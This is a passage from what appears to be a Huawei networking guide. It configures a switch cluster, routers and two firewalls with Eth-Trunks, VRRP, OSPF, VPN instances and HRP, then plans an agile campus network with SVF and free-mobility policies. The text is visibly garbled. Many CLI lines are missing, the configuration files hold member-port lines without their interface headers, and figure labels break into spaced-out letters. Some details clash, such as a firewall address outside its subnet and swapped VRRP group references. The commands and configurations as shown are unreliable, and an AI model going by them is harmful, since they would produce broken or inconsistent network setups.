to Eth-Trunk5.


# In the CSS, create Eth-Trunk6 to connect Public to FW2 and add member interfaces to
Eth-Trunk6.
# In the CSS, create Eth-Trunk7 to connect VRF-A to FW2 and add member interfaces
to Eth-Trunk7.

[CSS] vlan batch 20 30
[CSS] interface Vlanif 20 //Create VLANIF 20 for Public to connect to FW1
and FW2.
[CSS-Vlanif20] quit
[CSS] interface Vlanif 30 //Create VLANIF 30 for VRF-A to connect to FW1
and FW2.
[CSS-Vlanif30] quit

3. Configure inter-chassis Eth-Trunks between switches and service networks. Configure

VLANIF interfaces and assign IP addresses to them.
# In the CSS, create Eth-Trunk8 to connect to service network 1 and add member
interfaces to Eth-Trunk8.
# In the CSS, create Eth-Trunk9 to connect to service network 2 and add member
interfaces to Eth-Trunk9.

[CSS] interface Vlanif 100 //Create VLANIF 100 for CSS to connect to
service network 1.
[CSS] interface Vlanif 200 //Create VLANIF 200 for CSS to connect to
service network 2.
Step 3 On routers: Configure the interfaces between routers and CSS.

# Configure Router1, create Eth-Trunk1 on Router1, and add member interfaces to Eth-
Trunk1.
[Huawei] sysname Router1
[Router1] interface Eth-Trunk 1
[Router1-Eth-Trunk1] quit
[Router1] interface XGigabitethernet 1/0/1
[Router1-XGigabitEthernet1/0/1] undo shutdown
[Router1-XGigabitEthernet1/0/1] Eth-Trunk 1
[Router1-XGigabitEthernet1/0/1] quit
[Router1] interface XGigabitethernet 1/0/2
[Router1-XGigabitEthernet1/0/2] undo shutdown
[Router1-XGigabitEthernet1/0/2] Eth-Trunk 1
[Router1-XGigabitEthernet1/0/2] quit

# Configure the Dot1q termination subinterface for VLAN 10 and assign an IP address to the
subinterface.
[Router1] interface Eth-Trunk 1.100
[Router1-Eth-Trunk1.100] ip address 10.10.4.2 24
[Router1-Eth-Trunk1.100] dot1q termination vid 10
[Router1-Eth-Trunk1.100] quit
# The configuration procedure on Router2 is the same as that on Router1 except that the
interface addresses are different.
Step 4 On firewalls: Configure interfaces and zones.
# Configure interfaces and zones on FW1.
<USG> system-view
[USG] sysname FW1
[FW1] interface Eth-Trunk 4 //Configure the interface connected to CSS and
assign an IP address to it.
[FW1-Eth-Trunk4] ip address 10.10.2.2 24
[FW1] interface Gigabitethernet 1/0/0 //Add an interface to Eth-Trunk4.
[FW1-GigabitEthernet1/0/0] Eth-Trunk 4

[FW1] interface Eth-Trunk 1 //Configure the interface connecting FW1 to FW2.


[FW1-zone-trust] add interface Eth-Trunk 5 //Add Eth-Trunk5 connected to the
intranet to a trusted zone.
[FW1-zone-untrust] add interface Eth-Trunk 4 //Add Eth-Trunk4 connected to the
extranet to an untrusted zone.
[FW1-zone-dmz] add interface Eth-Trunk 1 //Add the interface between FW1 and
FW2 to the DMZ.
[FW1-zone-dmz] quit
# Configure interfaces and zones on FW2.

<USG> system-view
[USG] sysname FW2


[FW2] interface Eth-Trunk 1 //Configure the interface between FW2 and FW1.

[FW2-zone-trust] add interface Eth-Trunk 7 //Add Eth-Trunk7 connected to the
intranet to the trusted zone.
[FW2-zone-untrust] add interface Eth-Trunk 6 //Add Eth-Trunk6 connected to the
extranet to the untrusted zone.
[FW2-zone-dmz] add interface Eth-Trunk 1 //Add the interface between FW1 and
FW2 to the DMZ.
[FW2-zone-dmz] quit
Step 5 On routers: Configure VRRP. Configure Router1 as the VRRP master and Router2 as the
VRRP backup.
[Router1-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.4.100 //Configure the
VRRP virtual IP address.
[Router1-Eth-Trunk1.100] vrrp vrid 1 priority 120 //Increase the priority of
Router1 to make Router1 become the Master.
[Router2-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.4.100 //Configure the
VRRP virtual IP address.
After the configuration is complete, a VRRP group should have been set up between Router1
and Router2. You can run the display vrrp command to view the VRRP status of Router1 and
Router2.
# Check the VRRP status of Router1. The status is master.
[Router1] display vrrp

State : Master
Virtual IP : 10.10.4.100
Master IP : 10.10.4.2
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2015-05-18 06:53:47 UTC-05:13
# Check the VRRP status of Router2. The status is backup.

[Router2] display vrrp
State : Backup
Virtual IP : 10.10.4.100
Master IP : 10.10.4.2
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2015-05-18 06:53:52 UTC-05:13
Step 6 Configure routes between CSS and FWs and between CSS and routers.
1. Configure OSPF between switches and routers.
# Create VPN instance Public on CSS and bind the interfaces connected to routers and
firewalls to Public.
[CSS] ip vpn-instance Public //Create the VPN instance Public.
[CSS-vpn-instance-Public] ipv4-family
[CSS-vpn-instance-Public-af-ipv4] route-distinguisher 100:2
[CSS-vpn-instance-Public-af-ipv4] vpn-target 222:2 both
[CSS-vpn-instance-Public-af-ipv4] quit
[CSS-vpn-instance-Public] quit
[CSS] interface Vlanif 10
[CSS-Vlanif10] ip binding vpn-instance Public //Bind VLANIF 10, which
connects the CSS to router, to Public.
[CSS-Vlanif10] ip address 10.10.4.1 24 //Reconfigure an IP address for
VLANIF 10, because the preceding operation has deleted the original IP
address.
[CSS-Vlanif10] quit
[CSS-Vlanif20] ip binding vpn-instance Public //Bind VLANIF 20, which
connects the CSS to firewall's upstream interface, to Public.
address.
[CSS-Vlanif20] quit
# Configure a static route in Public to forward upstream traffic. Set the next hop of the
route to the VRRP virtual IP address of routers.
[CSS] ip route-static vpn-instance Public 0.0.0.0 0.0.0.0 10.10.4.100 //
Configure a default route for Public and set the next hop as the VRRP virtual
IP address of the router.

# Configure OSPF between CSS and routers to forward downstream traffic. Routers can
learn the return routes to service networks using OSPF.
[CSS] ospf 100 router-id 1.1.1.1
[CSS-ospf-100] area 0
[CSS-ospf-100-area-0.0.0.0] network 10.10.100.0 0.0.0.255 //Advertise the
routes on the network segment of service network 1 to OSPF.
routes on the network segment of service network 2 to OSPF.
routes on the network segment connected to Router to OSPF.
[CSS-ospf-100] import-route static //Import the static route to OSPF.
[CSS-ospf-100] quit
Configure OSPF on Router1 and Router2.

[Router1] ospf 100 router-id 2.2.2.2
[Router1-ospf-100] area 0
[Router1-ospf-100-area-0.0.0.0] network 10.10.4.0 0.0.0.255 //Advertise
the routes on the network segment connected to CSS to OSPF.
[Router2] ospf 100 router-id 3.3.3.3
[Router2-ospf-100] area 0
[Router2-ospf-100-area-0.0.0.0] network 10.10.4.0 0.0.0.255 //Advertise
the routes on the network segment connected to CSS to OSPF.
# After the configurations are complete, CSS, Router1, and Router2 can set up neighbor
relationships. For example, when you view OSPF neighbor information on the CSS, you
can find that Router1 and Router2 have set up OSPF neighbor relationships with CSS
and the neighbor status is Full.
[CSS] display ospf peer
Neighbors

State: Full Mode:Nbr is Master Priority: 1
DR: 10.10.4.1 BDR: 10.10.4.2 MTU: 0

DR: 10.10.4.1 BDR: 10.10.4.2 MTU: 0
2. Configure static routes between switches and FWs.

# Create VRF-A on the CSS to forward upstream traffic, and bind the interfaces
connected to service networks and downstream interfaces of firewalls to VRF-A. The
default route of VRF-A is the downstream VRRP virtual IP address (VRID2) of
firewalls.

[CSS] ip vpn-instance VRF-A //Create VRF-A.

[CSS-vpn-instance-VRF-A] ipv4-family
[CSS-vpn-instance-VRF-A-af-ipv4] route-distinguisher 100:1
[CSS-vpn-instance-VRF-A-af-ipv4] vpn-target 111:1 both
[CSS-vpn-instance-VRF-A-af-ipv4] quit
[CSS-vpn-instance-VRF-A] quit
[CSS-Vlanif100] ip binding vpn-instance VRF-A //Bind VLANIF 100, which
connects the CSS to service network 1, to VRF-A.
address.
connects the CSS to service network 2, to VRF-A.
address.
connects the CSS to the firewall's downstream interface, to VRF-A.
address.
[CSS-Vlanif30] quit
# Configure a default route in VRF-A. The next hop is the downstream VRRP 2 virtual
IP address (VRID2) of firewalls.
[CSS] ip route-static vpn-instance VRF-A 0.0.0.0 0.0.0.0 10.10.3.5
# Configure a static route in Public to forward downstream traffic. Set the next hop of
the route to the upstream VRRP 1 virtual IP address (VRID1) of firewalls.
[CSS] ip route-static vpn-instance Public 10.10.100.0 255.255.255.0
10.10.2.5 //The destination address is on service network 1 and the next
hop is the VRID2 virtual IP address of the two FWs.
[CSS] ip route-static vpn-instance Public 10.10.200.0 255.255.255.0
10.10.2.5 //The destination address is on service network 2 and the next
hop is the VRID2 virtual IP address of the two FWs.
3. Configure static routes on firewalls.

# Configure a static route on FW1.
[FW1] ip route-static 0.0.0.0 0.0.0.0 10.10.2.1 //For upstream traffic, the
next hop of the default route is the IP address of VLANIF 20 on Public.
[FW1] ip route-static 10.10.100.0 255.255.255.0 10.10.3.1 //For downstream
traffic, the destination address is on service network 1 and the next hop is
the IP address of VLANIF 30 on VRF-A.
# Configure a static route on FW2.

[FW2] ip route-static 0.0.0.0 0.0.0.0 10.10.2.1 //For upstream traffic, the
next hop of the default route is the IP address of VLANIF 20 on Public.
# After the configuration is complete, an OSPF neighbor relationship should have been
established between Router 1and Router 2. You can run the display ospf peer command

to view the OSPF neighbor status. The following uses the display on CSS switches as an
example. You can view that the OSPF neighbor status is Full.
# Check the routing table on CSS.

[CSS] display ip routing-table vpn-instance VRF-A
------------------------------------------------------------------------------
Routing Tables: VRF-A
0.0.0.0/0 Static 60 0 RD 10.10.3.5 Vlanif30

10.10.3.0/24 Direct 0 0 D 10.10.3.1 Vlanif30
10.10.3.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
10.10.100.0/24 Direct 0 0 D 10.10.100.1 Vlanif100
10.10.100.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.10.200.0/24 Direct 0 0 D 10.10.200.1 Vlanif200
10.10.200.1/32 Direct 0 0 D 127.0.0.1 Vlanif200
In the routing table on VRF-A, the first line indicates that the next hop for the traffic
destined for the Internet is the VRRP VRID 2 virtual IP address (10.10.3.5) of firewalls.
This indicates that upstream traffic is forcibly directed to firewalls for filtering.
[CSS] display ip routing-table vpn-instance Public
------------------------------------------------------------------------------
0.0.0.0/0 Static 60 0 RD 10.10.4.100 Vlanif10

10.10.2.0/24 Direct 0 0 D 10.10.2.1 Vlanif20
10.10.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.10.4.0/24 Direct 0 0 D 10.10.4.1 Vlanif10
10.10.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.10.100.0/24 Static 60 0 RD 10.10.2.5 Vlanif20
10.10.200.0/24 Static 60 0 RD 10.10.2.5 Vlanif20
In the routing table on Public, the first line indicates that the next hop for the traffic
destined for the Internet is the VRRP VRID 1 virtual IP address (10.10.4.100) of routers.
The fifth and sixth lines indicate that the next hop for the traffic destined for service
networks is the VRRP VRID 1 virtual IP address (10.10.3.5) of firewalls. This indicates
that downstream traffic is forcibly directed to firewalls for filtering.
Step 7 Configure HRP on firewalls.
# Configure HRP on FW1 and set FW1 as master.

[FW1] interface Eth-Trunk 4
[FW1-Eth-Trunk4] vrrp vrid 1 virtual-ip 10.10.2.5 24 master //Configure VRRP
group 1 on the upstream interface and set it status to master.
[FW1-Eth-Trunk5] vrrp vrid 2 virtual-ip 10.10.3.5 24 master //Configure VRRP
group 2 on the downstream interface and set it status to master.
[FW1] hrp interface Eth-Trunk 1 remote 10.1.1.2 //Configure the heartbeat
interface and enable HRP.
[FW1] firewall packet-filter default permit interzone local dmz
[FW1] hrp enable
HRP_M[FW1]

# Configure HRP on FW2 and set FW2 as slave.

[FW2-Eth-Trunk6] vrrp vrid 1 virtual-ip 10.10.2.5 24 slave //Configure VRRP
group 1 on the upstream interface and set it status to slave.
[FW2-Eth-Trunk7] vrrp vrid 2 virtual-ip 10.10.3.5 24 slave //Configure VRRP
group 2 on the downstream interface and set it status to slave.
[FW2] hrp interface Eth-Trunk 1 remote 10.1.1.1 //Configure the heartbeat
interface and enable HRP.
[FW2] firewall packet-filter default permit interzone local dmz
[FW2] hrp enable
HRP_M[FW2]
# Check VRRP status. FW1 is the master and FW2 is the slave.
HRP_M[FW1] display vrrp
Eth-Trunk4 | Virtual Router 1
VRRP Group : Master
State : Master
Virtual IP : 10.10.2.5
Virtual MAC : 0000-5e00-0101
Primary IP : 10.10.2.2
PriorityRun : 120
Advertisement Timer : 1
Auth type : NONE
Check TTL : YES

VRRP Group : Master
State : Master
Virtual MAC : 0000-5e00-0102
PriorityRun : 120
Auth type : NONE
Check TTL : YES
HRP_M[FW2] display vrrp
VRRP Group : Slave
State : Backup
Virtual MAC : 0000-5e00-0102
PriorityRun : 100
Auth type : NONE
Check TTL : YES

VRRP Group : Slave
State : Backup
Virtual MAC : 0000-5e00-0101
PriorityRun : 120


Auth type : NONE
Check TTL : YES
# Check HRP status.

HRP_M[FW1] display hrp state
The firewall's config state is: MASTER
Current state of virtual routers configured as master:

Eth-Trunk4 vrid 1 : master
(gigabitEthernet1/0/0) : up
Eth-Trunk5 vrid 2 : master
NOTE
After HRP is configured, the configurations and sessions on the active firewall are synchronized to the
standby firewall; therefore, you only need to perform the following configurations on the active firewall
FW1.
Step 8 Configure security policies on firewalls.

Only the connection configurations between firewalls and switches and the HRP
configurations on firewalls are provided in the following procedure. For the security service
plan on the firewalls and security policies, attack defense, bandwidth management, and IPSec
on the campus network, see Firewall Configuration Examples.
After the configurations are complete, check whether the CSS and routers can ping each other.
# Ping Eth-Trunk1.100 of Router1 from the CSS to check the uplink connectivity.
<CSS> ping 10.10.4.2

Reply From 10.10.4.2: bytes=32 seq=1 ttl=126 time=140 ms

0.00% packet loss
You can find that the CSS and Router1 can ping each other.
# Ping the VRF-A VLANIF 100 on the CSS from Router1 to check the downlink
connectivity.
<Router1> Ping 10.10.100.1



0.00% packet loss

You can find that Router1 and CSS VLANIF 100 can ping each other.
----End
Configuration Files
l Router1 configuration file
#
sysname Router1
#
#
ip address 10.10.4.2 255.255.255.0
#
interface XGigabitEthernet1/0/1
eth-trunk 1
#
eth-trunk 1
#
area 0.0.0.0
network 10.10.4.0 0.0.0.255
#
return
l Router2 configuration file

#
sysname Router2
#
#
ip address 10.10.4.3 255.255.255.0
#
eth-trunk 1
#
eth-trunk 1
#
area 0.0.0.0
network 10.10.4.0 0.0.0.255
#
return
l CSS configuration file

#
sysname CSS
#
vlan batch 10 20 30 100 200
#
ip vpn-instance Public
ipv4-family
route-distinguisher 100:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#

ip vpn-instance VRF-A
ipv4-family
#
interface Vlanif1
#
interface Vlanif10
ip binding vpn-instance Public
ip address 10.10.4.1 255.255.255.0
#
interface Vlanif20
ip binding vpn-instance Public
ip address 10.10.2.1 255.255.255.0
#
interface Vlanif30
ip binding vpn-instance VRF-A
ip address 10.10.3.1 255.255.255.0
#
interface Vlanif100
ip address 10.10.100.1 255.255.255.0
#
interface Vlanif200
ip address 10.10.200.1 255.255.255.0
#
#
#
#
#
#
#
#
#
ip address 10.10.100.3 255.255.255.0
#
interface GigabitEthernet1/1/0/7
eth-trunk 4

#
eth-trunk 5
#
eth-trunk 6
#
eth-trunk 7
#
eth-trunk 8
#
eth-trunk 9
#
eth-trunk 4
#
eth-trunk 5
#
eth-trunk 6
#
eth-trunk 7
#
eth-trunk 8
#
eth-trunk 9
#
interface XGigabitEthernet1/4/0/0
eth-trunk 1
#
eth-trunk 2
#
eth-trunk 1
#
eth-trunk 2
#
import-route static
area 0.0.0.0
network 10.10.100.0 0.0.0.255
network 10.10.200.0 0.0.0.255
network 10.10.4.0 0.0.0.255
#
ip route-static vpn-instance VRF-A 0.0.0.0 0.0.0.0 10.10.3.5
ip route-static vpn-instance Public 0.0.0.0 0.0.0.0 10.10.4.100
#
return
l FW1 configuration file
#
alias Eth-Trunk1
ip address 10.1.1.1 255.255.255.0
#
alias Eth-Trunk4
ip address 10.10.2.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.2.5 master

#
alias Eth-Trunk5
ip address 10.10.3.2 255.255.255.0
vrrp vrid 2 virtual-ip 10.10.3.5 master
#
alias GE0/MGMT
ip address 192.168.0.1 255.255.255.0
dhcp select interface
dhcp server gateway-list 192.168.0.1
#
undo enable snmp trap updown physic-status
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 1
#
eth-trunk 1
#
firewall zone local
set priority 100
#
firewall zone trust
set priority 85
#
set priority 5
#
firewall zone dmz
set priority 50
#
ip route-static 0.0.0.0 0.0.0.0 10.10.2.1
ip route-static 10.10.100.0 255.255.255.0 10.10.3.1
ip route-static 10.10.200.0 255.255.255.0 10.10.3.1
#
sysname FW1
#
hrp enable
hrp interface Eth-Trunk1 remote 10.1.1.2
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local trust direction
outbound
firewall packet-filter default permit interzone local untrust direction
outbound
firewall packet-filter default permit interzone local dmz direction inbound

firewall packet-filter default permit interzone local dmz direction outbound

#
return
l FW2 configuration file
#
alias Eth-Trunk1
ip address 10.1.1.2 255.255.255.0
#
alias Eth-Trunk6
ip address 10.10.2.3 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.2.5 slave
#
alias Eth-Trunk7
ip address 10.10.30.30 255.255.255.0
vrrp vrid 2 virtual-ip 10.10.3.5 255.255.255.0 slave
#
alias GE0/MGMT
ip address 192.168.0.1 255.255.255.0
dhcp server gateway-list 192.168.0.1
#
eth-trunk 6
#
eth-trunk 6
#
eth-trunk 7
#
eth-trunk 7
#
eth-trunk 1
#
eth-trunk 1
#
firewall zone local
set priority 100
#
firewall zone trust
set priority 85
#
set priority 5
#
firewall zone dmz
set priority 50
#
ip route-static 0.0.0.0 0.0.0.0 10.10.2.1
ip route-static 10.10.100.0 255.255.255.0 10.10.3.1
ip route-static 10.10.200.0 255.255.255.0 10.10.3.1
#
sysname FW2

#
hrp enable
hrp interface Eth-Trunk1 remote 10.1.1.1
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local trust direction
outbound
firewall packet-filter default permit interzone local untrust direction
outbound
firewall packet-filter default permit interzone local dmz direction inbound

firewall packet-filter default permit interzone local dmz direction outbound
#
return
2.4 Example for Configuring an Agile Campus Network
2.4.1 Solution Overview

Campus networks develop quickly and are carrying more diversified services. As smart
mobile terminals are popularized in campuses, users need to access campus networks during
moving and wireless data traffic increases rapidly. Cloud computing development requires
real-time service monitoring and service virtualization. Campus networks also need to carry
high definition (HD) video services and social networking services (SNSs). These service
requirements are challenging current network deployment. To meet these challenges, Huawei
introduces the agility concept to campus networks based on the software-defined networking
(SDN) architecture. Huawei agile campus network solutions help build high-performance core
networks and highly efficient wireless access networks and enable networks to be more agile
for services.
On agile networks, flexible and fast agile switches replace traditional switches. For example,
administrators can flexibly and fast configure, manage, and maintain devices. They do not
need to modify configurations for devices one by one to change a service or take a long time
to locate a network fault. Users can flexibly and fast access an agile network and enjoy the
same network experience at any locations using any access mode.
An agile campus network for a university is taken as an example in the following sections to
describe how agile networks improve the network services for campus users.
2.4.2 Networking Requirements

Figure 2-11 shows the original network in the university's main campus. Core switches
manage wired users, and independent ACs manage wireless users.
l Users in different areas of the main campus can access the campus network and connect
to the Internet through the campus network. Wired users use 802.1x authentication and
wireless users use Web authentication to access the network.
The following figure shows only the network deployment for teaching and office areas.
The network deployment for other areas is similar and is not shown in the figure.
l The network provides the Voice over Internet Protocol (VoIP), network printer, and
multimedia services.
l Users in branch campuses can access the main campus network through the Intranet.
l Users outside the campuses can access the main campus network through the Internet.

Figure 2-11 Campus networking diagram for the main campus (with no agile network
deployed)
Intranet Internet
Core switch S7700
Independent
AC
S5700LI
Teaching Office AP
S5700LI area area Teaching Office
area area
Wired users Wireless users
The service deployment on the current campus network faces the following problems:
l As the population in the university grows, a large number of wireless users demand for
wireless services. The wired and wireless networks are separately deployed and difficult
to manage. The university demands for the wired and wireless convergence to simplify
network management and improve network operation and maintenance (O&M)
efficiency.
l As various network services develop in the campus and users need to access the network
during moving, network information security becomes more important. The university
desires the classification of access user roles to ensure that service policies and network
experience are consistent wherever users go.
l The university has a large number of network devices and needs to frequently adjust
network services. Network administrators need to modify configurations or upgrade
versions on devices one by one to change a service, requiring heavy and trivial workload.

The university desires the centralized configuration, management, and maintenance of

network access devices.
l When a network fault occurs, network administrators cannot detect or troubleshoot it
quickly, affecting user experience. The university needs a real-time network quality
monitoring mechanism to reduce the impacts of network faults.
The university intends to deploy an agile network to simplify network deployment and
configuration, improve user experience, and improve O&M efficiency.
2.4.3 Network Planning

Figure 2-12 shows the agile campus networking. Two S12708 agile switches are deployed to
set up a cluster switch system (CSS) at the core layer. The S5700LI switches at the
aggregation and access layers are enabled with only Layer 2 forwarding (the S7700 core
switches in the original networking are used at the aggregation layer). Some APs are deployed
in the campus as needed. The S5700LI switches are deployed at the access layer to connect to
and manage wired users and APs, providing wired and wireless coverage for the campus.

Figure 2-12 Agile campus networking diagram
In tra n e t In te rn e t
A g ile n e tw o rk o n a R e m o te
b ra n c h c a m p u s a cce s s u se rs
E x te rn a l
e S ig h t C o re sw itch w e b site s e rve r
S12708
D a ta ce n te r A g ile C o n tro lle r
S 5700LI
AP S 5700LI
T e a ch in g O ffice R e sid e n tia l

L ib ra ry C a n te e n S ta d iu m
a re a a re a co m m u n ity
P u b lic a re a s
T e a c h e r L e e is
in th e o ffic e a re a
a t 8 :0 0 a .m .
T e a c h e r L e e is in
th e te a c h in g a re a
a t 1 0 :0 0 a .m .
in th e c a n te e n
a t 1 2 :0 0 a .m .
in th e lib ra ry a t
4 :0 0 p .m .
T e a c h e r L e e is in th e
re s id e n tia l c o m m u n ity
a t 8 :0 0 p .m .
The requirements for NEs shown in Figure 2-12 are as follows:

l Core switch
Agile switches are used at the core layer. If modular switches are used as agile switches,
X1E cards need to be installed on the switches to implement wired and wireless
convergence.
l Aggregation and access switches
The S2750EI/S5700LI/S5700S-LI/S5720EI (V200R007C00) and S5720SI/S5720S-SI/
S5710-X-LI/E600 (V200R008C00,and V200R009C00) switches can be used as
aggregation and access switches when the Super Virtual Fabric (SVF) function is
required.

l Agile Controller
The Agile Controller integrates functions of the RADIUS server, Portal server, and free
mobility controller, facilitating service adjustment. When a user connects to the network
from different locations, the free mobility controller uniformly delivers network access
rights to ensure that the user can have the same network access rights at different
locations.
l eSight network management system (NMS)
eSight provides a graphical user interface (GUI) to help manage network devices,
perform configurations, and facilitate convenient and visual management.
2.4.4 Feature Planning

After the S12708 agile switches are deployed on the campus network, the following agile
features can be applied to solve the service deployment problems described in 2.4.2
Networking Requirements, and to enable the network to fast and flexibly adapt to service
requirements.
l Wired and wireless convergence: Wired and wireless networks are uniformly managed
and maintained.
Agile switches at the core layer provide native capabilities on their line cards, so no
independent AC devices or AC cards (such as ACU2) are required. Administrators do
not need to configure and deploy user access services on the wired and wireless networks
respectively and can manage wired and wireless networks simply as managing one
device. The high switching capability and scalability of agile switches eliminate
bottlenecks in centralized traffic forwarding when independent ACs or AC cards are
used.
l Free mobility: Service control policies can be migrated with users, delivering consistent
experience for users.
For example, in 2.4.2 Networking Requirements, teacher Lee connects to the campus
network from the office area, teaching area, library, and residential community every
day. He may be granted different access rights on a traditional network. For example, he
can access the essay database only in the office area, teaching area, and library, but not in
public areas in the campus.
The free mobility solution enables users to have the same network access rights at
different locations. Network access policies are configured centrally on the Agile
Controller and delivered to all associated access devices. In this way, users can obtain the
same network access policies and enjoy consistent network access experience at any
locations and using any IP addresses.
Table 2-5 lists the access policies that are configured on the Agile Controller and
delivered to three user groups: guest, student, and teacher.
Table 2-5 Free mobility policy configuration
User (Source Resource (Destination Security Access Control

Security Group) Group) Policy
Guest Public resources (IP address: 10.10.1.1/32) Permit
Education management system (IP Forbid

address: 10.10.2.1/32)

User (Source Resource (Destination Security Access Control

Security Group) Group) Policy
Fire Transfer Protocol (FTP) resources (IP Forbid

address: 10.10.3.1/32)
Student Public resources (IP address: 10.10.1.1/32) Permit
Education management system (IP Forbid

address: 10.10.2.1/32)
Fire Transfer Protocol (FTP) resources (IP Permit

address: 10.10.3.1/32)
Teacher Public resources (IP address: 10.10.1.1/32) Permit
Education management system (IP Permit

address: 10.10.2.1/32)
Fire Transfer Protocol (FTP) resources (IP Permit

address: 10.10.3.1/32)
After the preceding policies are configured, users have the same network access rights
and network experience after passing authentication.
l Super Virtual Fabric (SVF): Agile switches deliver configurations to devices at the
aggregation and access layers.
The SVF solution virtualizes core, aggregation, and access switches on a network into
one switch. The core switch manages the aggregation and access switches, and uses
configuration templates to complete batch configuration of aggregation and access
switches. In this way, administrators do not need to configure switches one by one.
Table 2-6 describes the roles in an SVF system. The agile switch functions as a parent to
manage all access switches (ASs) and APs. In the SVF system, wired and wireless users
are all managed on the parent.
Table 2-6 SVF deployment

Role Device
Parent Two S12708 switches in a CSS
Client Level-1 Switches directly connected to the parent, providing wired

AS connections to access switches or terminals
Level-2 Switches directly connected to level-1 ASs, providing wired

AS connections to terminals
Wireless APs on a WLAN, providing wireless connections to terminals

access If APs are deployed in an SVF system, the parent functions as a
device wireless access controller (AC) to control and manage all APs.
Services on ASs are configured on the parent, and the key states of ASs and APs are
maintained on the parent. Administrators can complete service configurations for

aggregation and access switches by simply connecting unconfigured aggregation and

access switches to the parent. The aggregation and access layers realize zero-touch
configuration, automatic upgrade, and plug-and-play deployment, simplifying network
configuration, management, and maintenance.
NOTE
An SVF system supports at most two levels of ASs and one level of APs. When eSight is deployed to
manage the SVF system, SVF can better simplify device management.
l Packet Conservation Algorithm for Internet (iPCA): iPCA allows an agile network to be
aware of the service quality and to locate network failures.
An agile switch with iPCA configured can monitor packet loss in real time. Table 2-7
lists packet loss measurement modes. If a link fails, an iPCA-capable switch can quickly
detect the fault and sends an alarm to administrators immediately. iPCA allows the
network to be aware of the service quality, reducing impact of network failures. eSight
can display packet loss measurement results on a GUI, so administrators can easily
monitor the network quality.
Table 2-7 iPCA deployment

Packet Loss Deployment Scenario
Measurement
Mode
Network-level Monitor packet loss on the links between the main campus and
packet loss branch campuses. iPCA needs to be configured on local and
measurement remote core switches.
Device-level Monitor packet loss on core switches. iPCA only needs to be

packet loss configured on local core switches.
measurement
Table 2-8 lists the minimum versions supporting agile features and precautions for
configuring these features.
Table 2-8 Applicable versions and precautions

Agile Minimum Precaution
Feature Version
SVF V200R007 A license is required to enable the SVF function on a

(V200R007C20 parent.
is not included) When enabling the SVF function, ensure that the current
and next startup network admission control (NAC)
configuration modes are the unified mode.
NOTE
The Sx300 series switches cannot set up SVF systems.
Free V200R006 The Agile Controller needs to be deployed to enable the

mobility free mobility function. Free mobility is supported only in
the unified NAC mode.

Agile Minimum Precaution

Feature Version
iPCA V200R006 If modular switches are used, X1E cards need to be

installed.
Wired and V200R005 If modular switches are used, X1E cards need to be
wireless (V200R007C20 installed.
is not included) For details about the applicable AP models and versions,
see the product documents.
2.4.5 Data Planning

Basic Agile Campus Networking
This section uses simplified networking to replace the preceding agile campus networking to
describe the deployment of agile features. Figure 2-13 shows the networking for teaching
area 1 and library.

Figure 2-13 Basic agile campus networking diagram
B ra n c h c a m p u s
WAN
C o re s w itc h (S 9 7 0 6 )
in th e b ra n c h c a m p u s
C o re sw itch e s (S 1 2 7 0 8 ) in th e m a in
ca m p u s
A g ile C o n tro lle r

P a re n t_ 1 G E 1 /1 /0 /2 P a re n t_ 2
G E 1 /1 /0 /1 G E 2 /1 /0 /2
G E 2 /1 /0 /1
L ib a ra ry
(S 5 7 0 0 L I) (S 5 7 0 0 L I)
AS_1 AS_2
T e a c h in g a re a 1
(S 5 7 0 0 L I)
AS_3
G E 0 /0 /2 4 (A P 5 0 1 0 D N )
G E 0 /0 /2 3
PC_2 AP_2
(A P 5 0 1 0 D N )
PC _1 AP_1 STA_2
STA_1
Table 2-9 and Table 2-10 describe the data planning based on the preceding networking
diagram.
Table 2-9 Device data planning

Role Device Data
Parent Two S12708 switches in a CSS /
Level-1 AS Aggregation switches in MAC address: 0200-0000-0011

teaching area 1 IP address: 192.168.11.254/24
AS_1: S5700-52X-PWR-LI-AC
Access switches in the library MAC address: 0200-0000-0022

AS_2: S5700-52X-PWR-LI-AC IP address: 192.168.11.253/24

Role Device Data
Level-2 AS Access devices in teaching area MAC address: 0200-0000-0033

1 IP address: 192.168.11.252/24
AS_3: S5700-28X-PWR-LI-AC
AP Wireless access devices in MAC address: AC85-3DA6-A420

teaching area 1
AP_1: AP5010DN-AGN
Wireless access devices in the MAC address: AC85-3DA6-F240

library
AP_2: AP5010DN-AGN
Free mobility Agile Controller IP address: 192.168.2.31

controller NOTE Interconnection key: Huawei@123
The Agile Controller integrates
RADIUS server functions of the RADIUS server IP address: 192.168.2.31
and Portal server. Interconnection key: Huawei@123
On the Agile Controller, the fixed
RADIUS authentication port Authentication port number: 1812
number is 1812, and the fixed
Portal server Portal server port number is 50200. IP address: 192.168.2.31
Interconnection key: Huawei@123
Port number: 50200
Public resource File server 1 IP address: 10.10.1.1/32

server
Education File server 2 IP address: 10.10.2.1/32

management
system server
FTP resource File server 3 IP address: 10.10.3.1/32

server
Core switches on S9706 /

branch campus
networks
Table 2-10 VLAN data planning

Data Description
ID: 11 l SVF management VLAN on which a parent can set

IP address: 192.168.11.1/24 up Control and Provisioning of Wireless Access
Points (CAPWAP) tunnels with ASs and APs
l Service VLAN accessed by AP_1 in teaching area 1
and AP_2 in the library
l VLAN on which a parent can communicate with the
Agile Controller
ID: 101 Service set VLAN

Data Description
VLAN that wired users in Service VLAN accessed by wired users in teaching area
teaching area 1 belong to. 1, such as the VLAN that PC_1 belongs to.
ID: 100
IP address: 192.168.100.1/24
VLAN that wired users in the Service VLAN accessed by wired users in the library,
library belong to. such as the VLAN that PC_2 belongs to.
ID: 200
IP address: 192.168.200.1/24
